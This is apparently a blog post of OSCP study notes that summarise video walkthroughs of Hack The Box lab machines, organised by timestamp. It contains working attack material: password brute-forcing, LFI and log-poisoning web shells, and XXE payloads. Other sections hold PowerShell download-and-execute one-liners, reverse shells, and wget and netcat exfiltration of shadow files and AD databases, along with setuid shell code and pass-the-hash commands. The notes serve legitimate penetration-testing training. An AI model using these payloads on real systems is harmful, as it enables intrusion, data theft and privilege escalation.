Day 73: OSCP Notes from IPPSEC OSCP Style Videos

Atumcell Labs
19 min readMar 13, 2019

--

Nibbles

  • 00:18 — Start of Recon
  • 01:15 — Finding hidden directory via Source
  • 02:15 — Downloading NibbleBlog to help us with finding version information
  • 03:59 — Identifying what version of NibblesBlog is running
  • 04:42 — Using SearchSploit to find vulnerabilities
  • 05:36 — Examining the Exploit
  • 06:08 — Explanation of exploit
  • 07:25 — Attempting to find valid usernames for NibblesBlog
  • 09:13 — Finding usernames in /content/private
  • 10:15 — Using Hydra to attempt to bruteforce
hydra -l admin -P rockyou-50.txt http://10.10.10.75 http-post-form “/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect Username”hydra -l admin -P /usr/share/wordlists/Seclists/Passwords/10k_most_common.txt http://10.10.10.75 http-post-form “/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect” -t 64
  • 14:08 — Oh crap. Hydra not a good idea we are blocked…
    — Some minor panicking about how to continue
  • 15:40 — Using SSH Proxies to hit nibbles from another box (Falafel)
  • 18:20 — Guessing the password
  • 20:10 — Logged in, lets attempt our exploit!
  • 22:46 — Code Execution achieved. Lets get a reverse shell
  • 24:53 — Reverse shell returned.
  • 26:00 — Running sudo -l examine sudoer, then finding out why sudo took forever to return
  • 26:50 — Privesc via bad sudo rules
echo “bash” > monitor.sh
sudo bash
  • 32:10 — Alternative PrivEsc via RationalLove

[ ‘URL’, ‘https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/' ],
[ ‘URL’, ‘http://www.openwall.com/lists/oss-security/2018/01/11/5' ],
[ ‘URL’, ‘https://securitytracker.com/id/1040162' ],
[ ‘URL’, ‘https://sourceware.org/bugzilla/show_bug.cgi?id=22679' ],
[ ‘URL’, ‘https://usn.ubuntu.com/3534-1/' ],
[ ‘URL’, ‘https://bugzilla.redhat.com/show_bug.cgi?id=1533836' ]

Sense

  • 01:20 — Star of Recon
  • 03:40 — GoBuster
  • 04:45 — Getting banned and Pivoting to verify
  • 10:20 — Logging into PFSense
  • 16:50 — Manually Exploiting PFsense
  • 38:30 — Using Metasploit to exploit
  • 42:00 — Creating a Bruteforce Script in Python ( CSRF )
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import re
re_csrf = ‘csrfMagicToken = *(.*?)*’s = requests.session()lines = open(‘passwords.txt’)
for password in lines:
r = s.post(‘http://127.0.0.1/index.php')
csrf = re.findall(re_csrf, r.text)[0]
login = {‘__csrf_magic’: csrf, ‘usernamefld’: ‘rohit’, ‘passwordfld’: password[:-1], ‘login’: ‘login’}
r = s.post(‘http://127.0.0.1/index.php', data=login)
if ‘Dashboard’ in r.text:
print(“Valid Login %s:%s” % (“rohit”, password[:-1]))
else:
print(“Failed”)
s.cookies.clear()

To not be locked out, use proxychains through burp

Node

  • 00:45 — Begin of NMAP
  • 03:00 — GoBuster (Fails)
  • 08:15 — Screw GoBuster, BurpSpider FTW
  • 09:12 — Examing Routes File to find more pages
  • 10:10 — Finding Credentials and downloading backup
  • 14:45 — Cracking the zip with fcrackzip
fcrackzip -D -p /usr/share/wordlists/rockyou.txt backup.zip
# or
zip2john encrypted.zip > encrypted.hash
john — show encrypted.hash
  • 16:45 — Finding more credentials (SSH) within MongoSource
# Check source codes for passwords
grep -Ri password . |less
  • 21:50 — Privesc to Tom User
  • 35:04 — Analyzing Backup Binary File
  • 36:49 — Using strace to find binary password
  • 40:25 — Finding blacklisted characters/words
  • 50:00 — Unintended method one, abusing CWD
  • 52:20 — Unintended method two, wildcards to bypass blacklist
  • 54:45 — Unintended method three, command injection via new line
  • 59:15 — Intended root Buffer Overflow ASLR Brute Force

Valentine

  • 00:25 — Start of Recon, identifying end of life OS from nmap
  • 03:20 — Running vulnerability scripts in nmap to discover heartbleed
    (In video on Blue, I go a bit more in NMAP Scripts. https://www.youtube.com/watch?v=YRsfX...)
nmap — script vuln
  • 04:16 — Going to the HTTP Page to see what it looks like
  • 06:30 — Begin of Heartbleed — Grabbing Python Module
  • 07:13 — Explaining Heartbleed — XKCD ftw
  • 10:15 — Explaining and running the exploit
  • 13:40 — Exporting large chunks of memory by running in a loop
  • 14:10 — Finding an encrypted SSH Key on the server
  • 15:35 — Examining heartbleed output to discover SSH Key Password
  • 17:45 — SSH as low priv user returned
chmod 600 hype.key
ssh -i hype.key hype@10.10.10.79
  • 21:55 — Finding a writable tmux socket to hijack session and find a root shell

root is running tmux

/usr/bin/tmux -S /.devs/dev_sess
ls -la /.devs/dev_sess
srw-rw — — 1 root hype
Group can rw :)
tmux -S /.devs/dev_sess
  • 23:50 — Alternative Privesc, DirtyC0w

Poison

  • 00:56 — Start of recon, use Bootstrap XSL Script to make nmap pretty
    nmap-bootstrap.xsl

nmap -sC -sV -oA poison — stylesheet nmap-bootstrap.xsl
  • 03:10 — Looking at nmap in web browser
  • 03:52 — Navigating to the web page, and testing all the pages.
  • 06:25 — Testing for LFI
  • 07:00 — Using PHP Filters to view the contents of php file through LFI (Local File Inclusion)
/browse.php?file=php://filter/convert.base64-encode/resource=index.php
/browse.php?file=php://filter/convert.base64-encode/resource=/etc/passwd
  • 08:40 — Testing for RFI (Remote File Inclusion) [not vuln]
  • 10:00 — Code Execution via LFI + phpinfo()
  • 14:45 — Modifying the PHP-LFI Script code to get it working
  • 17:10 — Debugging the script to see why tmp_name couldn’t be found
  • 20:12 — Shell returned!
  • 21:25 — Looking at pwdbackup.txt and decoding 13 times to get password.
  • 23:37 — SSH into the box (Do not privesc right away!)
  • 24:29 — Getting shell via Log Poisoning
  • 26:39 — Whoops. Broke the exploit, because of bad PHP Code… We’ll come back to this! (42:50)
  • 28:47 — Begin of PrivEsc, grabbing secret.zip off
  • 32:38 — Searching for processes running as root, find VNC
  • 33:49 — Setting up SSH Tunnels without exiting SSH Session.
  • 37:43 — Something weird happend… Setting up SSH Tunnels manually.
  • 40:10 — PrivEsc: VNC through the SSH Tunnel, passing the encrypted VNC Password
vncviewer -passwd secret 127.0.0.1::6901
vncpwd .vnc/passwd
  • 42:50 — Examining the log file to see why our Log Poison Failed, then doing the Log Poison
User-Agent: <?php system($_REQUEST[‘cmd’]$); ?>

Sunday

  • 00:48 — Begin of NMAP Discovery of Finger
  • 03:36 — Enumerating Finger with Finger-User-Enum
    scanner/finger/finger_users
  • 05:00 — Nmap’ing all port quickly by lowering max-retries
nmap -p- -oA allports.nmap — max-retries 1
  • 08:40 — Adding an old Key Exchange Algorithm to SSH
    Unable to negotiate
ssh -okeyAlgorithms=+diffie-hellman-group1-sha1 -p 2233 user@ip
  • 09:30 — Showing Hydra doesn’t work, then using Patator
    (Patator also can do Finger Enum! Try it out)
  • 11:19 — Using find to count lines in all wordlist files
  • 14:07 — Logged in with sunny:sunday
  • 14:45 — Grabbing /backup/shadow.backup and cracking sha256crypt with Hashcat
Shadow file pass
hashcat -m7400 hash.hash rockyou.txt
  • 16:46 — Just noticed this box is old, try to privesc with sudo and ShellShock (Fail)
  • 18:53 — Privesc by overwriting the /root/troll binary
    == Box Done
  • 23:30 — Using wget to exfil files quickly
  • 24:50 — Viewing what wget — post-file looks like
sudo wget — post-file=/etc/shadow 10.10.10.10?filename=shadow
  • 25:50 — Creating a PHP Script to accept uploaded files

<?php
$fname = basename($_REQUEST[‘filename’]);
file_put_content(‘upload/’ . $fname, file_get_contents(‘php://input’));
?>
  • 27:30 — Hardening our upload location to prevent executing PHP Files and/or reading what was uploaded
  • 29:10 — Starting a php webserver with php -S (ip):(port) -t .
php -S 10.10.10.10.:8001 -t .
  • 31:10 — Replacing the root password by changing the shadow file
  • 33:30 — Demoing a way to create directories and upload files!

Brainfuck

  • 0:20 — Recon (Check the SSL cert for emails etc)
  • 3:40 — Start of WP Hacking
  • 10:30 — Logged into WP (Check site admin for passwords etc, like settings pages)
  • 15:00 — Login to SuperSecretForum
    Evolution Mail Client, if get creds then just add as mail account
  • 25:00 — Cracking the SSH Key
sshng2john.py /root/id_rsa > /root/crack
john /root/crack — wordlist=/opt/wordlist/rockyou.txt
  • 27:15 — Begin of getting root.txt (RSA Cracking)
pt =”39…2321"
str(hex(pt)[2:-1]).decode(‘hex’)

The site used to during the SecretForum session

Nineveh

00:00 — Intro
01:58 — Begin Recon (NMAP)
04:19 — GoBuster HTTP + HTTPS
06:35 — Accessing Pages
07:05 — Using Hydra against HTTP + HTTPS Web Forms

hydra -l admin -P /usr/share/wordlists/Seclists/Passwords/10k_most_common.txt http://10.10.10.75 http-post-form “/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect Username” -t 64

11:30 — Logging into HTTP and hunting for vulns
17:00 — Second Hydra attempt against HTTPS
17:57 — Logging into HTTPS (phpLiteAdmin)

apache-server.com/~user
grep -i ^password /usr/share/wordlists/rockyou.txt > pw

20:17 — Chaining Exploits to get Code Execution
phpLiteAdmin — create db table with php function

26:38 — Reverse Shell Returned
Reverse shell cheat sheet

28:00 — LinEnum.sh Script Review

31:30 — Watching for new Processes

IFS=$’\n’
for i in $(ps -eo command); do echo $i; done

procmon.sh

37:00 — Found the error in script :)
39:30 — Getting reverse root shell
41:51 — Intended Route to get User
46:12 — Reviewing Knockd configuration
49:33 — Doing the PortKnock

Kotorak

01:38 — Start of nmap
03:40 — Accessing port 60000
06:20 — Manually enumerating ports on localhost via SSRF
07:00 — Using wfuzz to portscan localhost via SSRF

wfuzz -c -z range,1–65535 — hl=2 http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ

10:00 — Tomcat creds exposed & Uploading tomcat reverse shell
/manager/html

msfvenom -l 
msfvenom — p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=80 -f war > shell.war

13:40 — Return of shell
14:20 — Extracting NTDS + SYSTEM Hive
NTDS contains passwords etc for Active directory
MS Windows registry file

On target

nc 10.10.10.10 443 < *.dit: data (ntds.dit)
nc 10.10.10.10 443 < *.bin: MS Windows registry file, NT/2000 or above (SYSTEM)

On box:

nc -lvnp 443 > ntds.dit
nc -lvnp 443 > SYSTEM
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

20:20 — Using HashKiller to crack the hashes

Ignore $ accounts as they are system accounts with strong passwords

nano hashes
awk -F: ‘{print $4}’ hashes
hashkiller.co.uk

21:30 — Escalating to Atanas & Identifying wget vulnerability
Wget < 1.18 vuln

27:10 — Starting exploit
33:22 — Exploit failed, light debugging
35:40 — Issue found, not listening all interfaces
39:35 — Root shell returned.
40:10 — Unintentional Root Method (Edited Footage, IP Change)

lxc priv esc
groups
disk is good to be member of

ls -la /dev/sd*
mount

on attacker box:

nc -lvnp 8003 > disk.img.gz
gunzip disk.img.gz
mount disk.img /mnt
cd /mnt
cd /mnt/var/lib/lxc/$DIR/rootfs/root

Box:

dd if=dm-0 | gzip -1 — | nc 10.10.10.10 8003
/usr/sbin/arp -a

Tatarsauce

01:10 — Begin of recon
03:00 — Discovery of Wordpress and fixing broken links with burp
06:50 — Start of WPScan
07:14 — Start of poking at Monstra, (Rabbit Hole)
13:05 — Back to looking at WPScan, Find Gwolle Plugin is vulnerable to RFI Exploits
16:30 — Reverse shell returned as www-data
18:08 — Confirming monstra was read-only
18:50 — Running LinEnum.sh to see www-data can run tar via sudo
20:30 — Use GTFOBins to find a way to execute code with Tar
sudo tar file write from GTFObins

22:00 — Begin of Onuma user, use LinEnum again to see SystemD Timer of a custom script
24:10 — Examining backuperer script
26:00 — Hunting for vulnerabilities in Backuperer
32:15 — Playing with If/Then exit codes in Bash. Tuns out exit(0/1) evaluate as True, 2 is false
34:20 — Begin of exploiting the backuperer service by exploiting intregrity check
36:40 — Creating our 32-bit setuid binary

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main ( int argc, char &argv[] )
{
setreuid(0,0);
execve(“/bin/sh”, NULL, NULL)
}

39:16 — Replacing backup tar, with our malicious one. (File Owner of Shell is wrong)
40:54 — Explaning file owners are embedded within Tar, creating tar on our local box so we can have the SetUID File owned by root

gcc -m32 -o Escalate setuid.c
apt search gcc-multilib
chmod 6555

42:30 — Exploiting the Backuperer Service via SetUID!
45:00 — Unintended Exploit: Using SymLinks to read files via backuperer service

If root services uses for example /var/www/html/index.html in cron etc we can symlink
ln -s /etc/shadow /var/www/html/index.html

Blue

00:38 — Start of Recon
01:20 — Finding NMAP Scripts (Probably a stupid way)

ls /usr/share/nmap/scripts/ | grep smb

02:00 — Running Safe Scripts — Not -sC, which is default.

nmap -p 445 — script safe -Pn -n 10.10.10.10

02:52 — Listing NMAP Script Categories (Prob a really stupid way)
03:18 — Really Cool Grep (Only show matching -oP)

| grep -oP ‘“.*?”’| sort -u

04:40 — Nmap Safe Script Output
06:30 — Exploiting MS17–010 with MSF
07:40 — Setting up Dev Branch of Empire
09:07 — Starting a Listener

empire> userlistener http
empire> getinfo
empire> set Host http://10.10.10.10
empire> set Port 443
empire> execute
empire> back
empire> launcher powershell http

COPY THIS CODE INTO empire.ps1

empire> usestager

10:55 — Getting a PowerShell Oneliner to launch payload

powershell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.10.10/empire.ps1')"

empire> agents

12:16 — Invoke-Expression (IEX) to Execute Launcher
13:25 — Interacting with a single agent
13:40 — Using Modules — PowerUp Invoke-AllChecks

empire> usemodule privesc/powerup/allchecks
empire> execute

14:40 — Fixing weird issue with PS Module
16:15 — Invoke-AllChecks finished
17:15 — Loading PS Modules into Memory
17:40 — Executing funcitons out of above module
18:20 — Why I don’t pass to MSF via InjectShellcode
22:45 — How I pass from Empire to MSF (Unicorn + IEX)
25:53 — Just running Powershell CMDs from Empire (Shell)

shell dir
shell IEX(New-Object Net.WebClient).downloadString(‘http://10.10.10.10/file.txt')

Devel

01:02 — Going over NMAP
02:00 — Anonymous FTP + File Upload
04:30 — MSFVenom
07:20 — Metasploit
10:00 — Exploit Suggestor
11:30 — Getting Root

Optimum

1:38 — Go to HTTPFileServer
2:56 — Explanation of Vulnerability
4:49 — Testing the Exploit
6:25 — Getting rev tcp shell with Nishang

Pentest Box:

Invoke-PowerShellTcp.ps1
python -m SimpleHTTPServer 9000

Box:

/>search=%00(.exec|c:\Windows\SysNative\WindowsPowershell\v1.0\Powershell.exe IEX(New-Object Net.WebClient).downloadString(‘http://10.10.10.10:9000/Invoke-PowershellTcp.ps1').)

11:54 — Shell returned
13:15 — Finding exploits with Sherlock

Sherlock.ps1

15:15 — Using Empire Module without Empire for Privesc

Copy code from exploit file in Empire, cp .

21:00 — Start of doing the box with Metasploit
22:36 — Reverse Shell Returned (x32)
24:45 — MSF Error during PrivEsc
25:35 — Reverse Shell Returned (x64)
26:19 — Same PrivEsc as earlier, different result
28:47 — Examining how Rejetto MSF Module works with Burp

Silo

01:30 — Begin of recon
03:15 — Begin of installing SQLPlus and ODAT (Oracle Database Attack Tool)
08:45 — Bruteforcing the SID with ODAT

odat.py sidguesser -s 10.10.10.10 -p 1521

10:15 — Holy crap, this is slow lets also do it with Metasploit
13:00 — Bruteforcing valid logins with ODAT
16:00 — Credentials returned, logging into Oracle with SQLPlus as SysDBA

sqlplus64 scott/tiger@10.10.10.10:1521/XE

19:00 — Reading files from disk via Oracle

SQL> declare
f utl_file.tile.type;
s varchar(400);
begin
f := utl_file.fopen(‘/inetpub/wwwroot’, ‘iisstart.htm’, ‘R’)
utl_file.get_line(f,s);
utl_file.close(f);
end;
SQL> set serveroutput ON

23:20 — Writing files to disk from Oracle. Testing it in WebRoot Directory

SQL> declare
f utl_file.tile.type;
s varchar(5000) := ‘Hello World’;
begin
f := utl_file.fopen(‘/inetpub/wwwroot’, ‘helloworld.txt’, ‘W’)
utl_file.put_line(f,s);
utl_file.close(f);
end;

25:52 — File Written, lets write an ASPX WebShell to the Server

Pentest Box:

locate -r .aspx
cp $DIR/cmdasp.aspx .
sed -z ‘z/\n//g’ cmdasp.aspx

Target:

SQL> declare
f utl_file.tile.type;
s varchar(5000) := ‘OUTPUT FROM cmdasp.aspx’;
begin
f := utl_file.fopen(‘/inetpub/wwwroot’, ‘Shell.aspx’, ‘W’)
utl_file.put_line(f,s);
utl_file.close(f);
end;

Remove all the junk and styling etc.

29:10 — WebShell Working! Lets get a Reverse Shell
31:28 — Reverse Shell Returned
32:24 — Finding a DropBox link, but password doesn’t display well.
33:55 — Attempting to copy file via SMB to view UTF8 Text
35:18 — That didn’t work, lets transfer the file by encoding it in Base64.
36:55 — Got the password lets download the dump!
39:10 — Begin of Volatility

Memory Dump
volatility -f FILE.dmp imageinfo
volatility -f FILE.dmp — profile Win2012R2x64 hashdump

45:20 — Running the HashDump plugin from volatilty then PassTheHash with Administrator’s NTLM!

pth-winexe -U Administrator%aad39829e8d9s98c9zc89989:83279287982d9s8d7987932 //10.10.10.10 cmd

### Box Done
47:35 — Begin of unintended way, examining odat and uploading an meterpreter exe
50:30 — Using odat externaltable to execute meterpreter and get a system shell!
52:20 — Examining odat verbosity flag to see what commands it runs and try to learn.

Bounty

00:38 — Begin of recon
01:48 — Gobuster, using -x aspx to find aspx pages
03:16 — Playing with a file upload form, seeing what can be uploaded
05:15 — Using Burp Intruder to automate checking file extensions
07:00 — Finding a way to execute code from file upload in ASPX (web.config)

poc-server.com
[RCE by uploading a web.config — 003Random’s Blog](https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/)

<?xml version=”1.0" encoding=”UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy=”Read, Script, Write”>
<add name=”web_config” path=”*.config” verb=”*” modules=”IsapiModule” scriptProcessor=”%windir%\system32\inetsrv\asp.dll” resourceType=”Unspecified” requireAccess=”Write” preCondition=”bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=”.config” />
</fileExtensions>
<hiddenSegments>
<remove segment=”web.config” />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!–-
<% Response.write(“-”&”->”)
Response.write(“<pre>”)
Set wShell1 = CreateObject(“WScript.Shell”)
Set cmd1 = wShell1.Exec(“whoami”)
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write(“</pre><!-”&”-”) %>
-–>

10:55 — Executing code via web.config file upload

ls /opt/shells | grep asp

13:08 — Installing Merlin to be our C2
15:25 — Compiling the Merlin Windows Agent
18:37 — Modifying web.config to upload and execute merlin
21:14 — Merlin Shell returned!

Merlin> use module windows/x64/powershell/

24:18 — Checking for SEImpersonatePrivilege Token then doing Juicy Potato
27:44 — Getting Admin via Juicy Potato

29:44 — Box completed

30:00 — Start of doing this box again, with Metasploit! Creating a payload with Unicorn
33:00 — Having troubles getting the server call back to us, trying Ping to see if the exploit is still working
34:17 — Reverted box. Have to update our payload with some updated VIEWSTATE parameters
36:45 — Metasploit Session Returned! Checking local_exploit_suggester
40:01 — Comparing local_exploit_suggester on x32 and x64 meterpreter sessions
40:30 — Getting Admin via MS10–092
42:05 — Attempting to pivot through the Firewall using Meterpreter and doing Eternal Blue! (Fails, think I screwed up listening host #PivotProblems)
47:20 — Creating a Python Script to find valid extensions that handles CSRF Checks if they had existed

Jerry

00:45 — Introduction, nmap
01:30 — Clicking around in Tomcat
02:20 — Playing around with HTTP Authentication
05:45 — Bruteforcing tomcat default creds with Hydra and seclists

08:20 — Sending hydra through a proxy to examine what is happening
12:50 — Logging into tomcat and using msfvenom + metasploit to upload a malicious war file
22:42 — Begin of doing this box without MSF
23:45 — Downloading a cmd jsp shell and making a malicious war file
26:25 — WebShell returned
28:00 — Begin of installing SilentTrinity
SILENTRINITY

apt install python3.7-dev
python3.7 -m pip install requirements.txt
python3.7 st.py

30:55 — SilentyTrinity Started, starting listener and generating a payload

st> listeners
st> list
st> use http
st> start
st> stagers
st> list
st> generate http

33:00 — Pasting the payload into the webshell
34:00 — Debugging SSL Handshake errors
37:00 — Starting SilentTrinity back up, how to use modules
39:10 — Start of Execute-Assembly, compiling Watson
43:10 — Running Watson

RastaMouse Watsonmkdir smb
cd smb
impacket-smbserver -u phtr -p pwnyhacker transfer ‘pwd’

43:30 — Start of Seatbelt and debugging why some dotNet code may not run (versioning issues)

SilentTrinity Talk: https://www.youtube.com/watch?v=NaFiA...

Jeeves

01:19 — Begin of Enumeration
04:15 — Avoiding the Rabbit Hole on port 80 (IIS)
06:00 — Begin of Jenkins
09:00 — Using Jenkins Script Console (Groovy) to gain code execution
12:00 — Reverse TCP Shell via Nishang
Invoke-PowerShellTcp.ps1

17:00 — Reverse Shell returned. PowerSplit dev branch to find unintended privesc (Tokens)
22:20 — Powersploit’s Invoke-AllChecks completes
24:20 — Finding Keepass Database using Impack-SMBServer to transfer files
27:00 — Cracking the KeePass Database
30:20 — Using KeePass2 to open database
34:25 — PassTheHash via pth-winexe to gain administrator shell

pth-winexe -U jenkins/Administrator%aad39829e8d9s98c9zc89989:83279287982d9s8d7987932 //10.10.10.10 cmd.exe

35:20 — Grabbing root.txt that is hidden via Alternate Data Streams (ADS)

> dir /
> powershell (Get-Content hm.txt -Stream root.txt).substring(0,16)

### BOX DONE
39:00 — Using RottenPotato to escalate to root via MSF
41:00 — Using Unicorn to gain a reverse MSF SHell
45:20 — Performing the attack
48:00 — Impersonating Token to gain root
### Unintended Done. Rest of video is me failing around, may be useful?

Good Read: https://foxglovesecurity.com/2016/09/...
If you want to try Rotten Potato without MSF Read this:

Bart

01:54 — Begin Recon, Windows IIS/OS Mapping and GoBuster
05:20 — Explanation of Virtual Host Routing
09:50 — Developers name exposed in HTML Source, also discover /monitor
11:10 — Enumerating Username in PHP Server Monitor: Challenge Watch Sense to und
erstand CSRF and write an automated bruteforcer
16:33 — Discover of Internal-01.bart.htb
19:17 — Harveys Password with Hydra (Note: This is bypassable if you DIRBUST to find /Log/log.php)
29:34 — Finally got Hydra to return the password!
32:20 — Log Poisoning + LFI = Remote Code Execution

37:30 — Return of Reverse Shell
41:30 — Why you should check if you’re a 32-bit process on a 64-bit machine
### Start of Failing attempting to do a RunAs… Lol.
48:35 — Attempting to use b33f/FuzzySecurity Invoke-RunAs
56:00 — Mistake with Invoke-RunAs is probably pointing it to the wrong port. D:
01:03:40 — ARGH! Lets try to use this account via Empire
01:11:00 — Bring out the big guns, it’s Metasploit Time!
01:18:10 — Alright, lets poke a hole in the firewall and connect over SMB!
01:21:17 — Failed to PSExec in MSF
### End of Failing!
01:21:40 — Found Impacket-PSExec! And it works!

smbexec.py Administrator:232323423424234234@10.10.10.10

### Box Done
01:23:45 — Lets go hunt for creds!
01:35:23 — Cracking Salted Hashes with Hashcat (Sha265.Salt)

Tally

01:45 — Start of NMAP
04:17 — Begin of Sharepoint/GoBuster (Special Sharepoint List)

wget -m ftp://username:password@ip

06:32 — Manually browsing to Sitecontent (Get FTP Creds)
10:18 — Mirror FTP + Pillage for information, Find keypass in Tim’s directory and crack it.
18:22 — Mounting/Mirroring ACCT Share with found Creds and finding hardcoded SQL Creds
25:24 — Logging into MSSQL with SQSH, enabling xp_cmdshell and getting a Nishang Rev Shell
34:35 — Finding SPBestWarmUp.ps1 Scheduled Task that runs as Administrator
40:00 — Begin of RottenPotato without MSF (Decoder’s Lonely Potato)
45:56 — Using Ebowla Encoding for AV Evasion to create an exe for use with Lonely Potato

[GitHub — Genetic-Malware/Ebowla: Framework for Making Environmental Keyed Payloads (NO LONGER SUPPORTED)](https://github.com/Genetic-Malware/Ebowla)

58:00 — Lonely Potato Running to return a Admin Shell
### BOX DONE
01:04:22 — Finding CVE-2017–0213
01:08:33 — Installing Visual Studio 2015 && Compiling the exploit
01:15:50 — Exploit Compiled, trying to get it to work….
01:18:11 — Just noticed the SPBestWarmUp.ps1 executed and gave us a shell!
01:28:37 — Found the issue, exploit seems to require interactive process
01:30:00 — Begin of Firefox Exploit Cluster (Not recommended to watch lol). It’s a second unreliable way to get user

Active

01:10 — Begin of recon
03:00 — Poking at DNS — Nothing really important.
04:00 — Examining what NMAP Scripts are ran.
06:35 — Lets just try out smbclient to list shares available

smbclient -L //10.10.10.10
enum4linux 10.10.10.10

07:25 — Using SMBMap to show the same thing, a great recon tool!
08:30 — Pillaging the Replication Share with SMBMap

smbmap -R Replication -H 10.10.10.10

09:20 — Discovering Groups.xml and then decrypting passwords from it

smbmap -R Replication -H 10.10.10.10 -A Groups.xml -q
gpp-decrypt ed254k53jh4k2jh423k4jh2k2jh4k234k23j4h32k4kj23h4k32jh4+32kj4hk32jh4/23k43

13:10 — Dumping Active Directory users from linux with Impacket GetADUsers

smbclient //10.10.10.10/Replicationsmb> recurse ON
smb> prompt OFF
smb> mget *
GetAdUsers.py -all domain.htb/svc_tgs -dc-ip 10.10.10.10

16:28 — Using SMBMap with our user credentials to look for more shares

smbmap -d active.htb -u svc_tgs -p password123 -H 10.10.10.10 -R Users

18:25 — Switching to Windows to run BloodHound against the domain
26:00 — Analyzing BloodHound Output to discover Kerberostable user
27:25 — Performing Kerberoast attack from linux with Impacket GetUsersSPNs
29:00 — Cracking tgs 23 with Hashcat
30:00 — Getting root on the box via PSEXEC

Jail

00:52 — Recon — NMAP
04:05 — Recon — Getting Linux Distro
04:35 — Recon — GoBuster
05:40 — Analyzing Jail.c source
09:45 — Begin Binary Exploitation
15:10 — Verify Buffer Overflow
17:35 — Create Exploit Skeleton
20:50 — Finding EIP Overwrite
23:02 — Adding Reverse TCP Shellcode
30:15 — Switching to “Socket Re-Use” Shellcode
32:20 — Shell Returned
34:00 — NFSv3 Privesc Begin
40:15 — Begin incorrectly playing with SetUID
43:10 — SELinux Escape
45:25 — Using SELinux Escape to copy SSH Key
48:55 — Logging in as Frank
50:00 — Privesc to adm (sudo rvim)

sudo -u adm /usr/bin/rvim /var/www/file.c
vimr > python import pty; pty.spawn(“/bin/bash”)

51:44 — Begin of finding a way to root
55:58 — Begin cracking rar file
57:18 — Using Hashcat to generate custom wordlist

hashcat --stdout -a 3 Morris19?d?d?s > /root/jail.words

60:40 — Cracking with JohnTheRipper
62:30 — RsaCtfTool to exploit weak SSH Pub Key
63:36 — Login as root with SSH Private Key
64:11 — EXTRA CONTENT: Alternative Privesc to ADM (NFS)
65:21 — Creating a directory to give other users NFS Write access
67:30 — Correct way to do SetUID Program
71:04 — Using SetUID Programs to write to disk

Falafel

01:15 — Begin of Recon
04:25 — Bruteforcing valid users
11:15 — Manually finding SQL Injection
13:13 — Using — string with SQLMap to aid Boolean Detection
15:41 — PHP Type Confusion ( == vs === with 0e12345) [Type Juggling]
18:35 — Attempting Wget Exploit with FTP Redirection (failed)
26:39 — Exploiting wget’s maximum file length
33:30 — Reverse Shell Returned
36:19 — Linux Priv Checking Enum
41:00 — Checking web crap for passwords
44:00 — Grabbing the screenshot of tty
49:00 — Privesc via Yossi being in Disk Group (debugfs)

$> strings /dev/sda1 | grep root.txt
$> locate -r */debug$
$> debugfs /dev/sda1
$> cd root

50:15 — Grabbing ssh root key off /dev/sda1
52:15 — Attempting RationLove (Fails, apparently machine got patched so notes were wrong /troll)
01:07:42 — Manually exploiting the SQL Injection! with Python

DevOops

00:54 — Start of Recon
03:10 — Start of GoBuster
04:00 — Looking at /upload, testing with a normal XML File
06:15 — Valid XML File created, begin of looking for XML Entity Injection XXE
08:20 — XXE Returns a a local file off the server

<?xml version="1.0"?>
<!DOCTYPE data[
<!ELEMENT data (ANY)>
<!ENTITY file SYSTEM "/etc/passwd">
]>
<Pwned>
<Author>int33</Author>
<Subject>&file;</Subject>
<Content>int333</Content>
</Pwned>

09:30 — Grabbing the source code to the webserver to find newpost function.
11:35 — Discovery of vulnerability due to user data being passed to pickle
12:44 — Creating the script to exploit pickle
16:38 — Reverse shell returns!
19:55 — Poking around at Source Code
20:15 — Discover of an SSH Key within deployment stuff.
21:15 — Trying SSH Key for other users on the box to see if it is valid
22:57 — Hunting for git filers, the boxes name is “Gitter” and we have an SSH Key that goes nowhere.
23:00 — Discovery ~roosa/work is the same as ~roosa/deploy but there’s a .git repo in this one!
23:45 — Examining Git Log to see the SSH Key has changed!
25:20 — SSH’ing with the old key, to see it’s root’s key.
25:58 — The webserver could read Roosa’s SSH Key. Could bypass the entire pickle portion
26:20 — Start of “Extra Practice”
27:40 — Creating a Python Script to automate the LFI With XXE
== Note this piece leads to failure. However, if we could convert the output to a more friendly format such as Base64 it would of worked. This is likely in PHP WebServers due to “PHP Wrappers”, perhaps it is with python too but I don’t know a way ==
35:50 — Script completed, lets improve it to try to download an exposed git repo

Hawk

01:00 — Begin nmap, discover FTP, Drupal, H2, and its Ubuntu Beaver
03:50 — Checking FTP Server for hidden files
04:30 — Examining encrypted file, discovering encrypted with OpenSSL and likely a block cipher
08:20 — Creating a bunch of files varying in length to narrow likely ciphers down.
14:35 — Encrypting all of the above files and checking their file sizes
22:45 — Decrypting file, obtaining a password
24:25 — Begin looking at Drupal, running Droopescan
25:12 — Manually examining Drupal, finding a way to enumerate usernames
25:50 — Placing invalid emails in create account, is a semi-silent way to enumerate usernames
28:15 — Logging into Drupal with Admin.
29:25 — Gaining code execution by enabling PHP Plugin, then previewing a page with php code
32:30 — Reverse Shell Returned
33:25 — Running LinEnum.sh — Discover H2 (Database) runs as root
37:00 — Hunting for passwords in Drupal Configuration
39:25 — Finding database connection settings. SSHing with daniel and the database password (not needed)
40:10 — Doing Local (Daniel) and Reverse (www) SSH Tunnels. To access services on Hawk’s Loopback. Only need to do one of those, just showing its possible without daniel
44:30 — Accessing Hawk’s H2 Service (8082) via the loopback address
50:00 — Finding the H2 Database Code Execution through Alias Commands, then hunting for a way to login to H2 Console.
51:45 — Logging into H2 by using a non-existent database, then testing code execution
52:50 — Playing with an awesome Reverse Shell Generator (RSG), then accidentally breaking the service.
59:50 — Reverted box, cleaning up environment then getting reverse shell
01:02:45 — Discovering could have logged into the database with Drupal Database Creds.

--

--

Atumcell Labs
Atumcell Labs

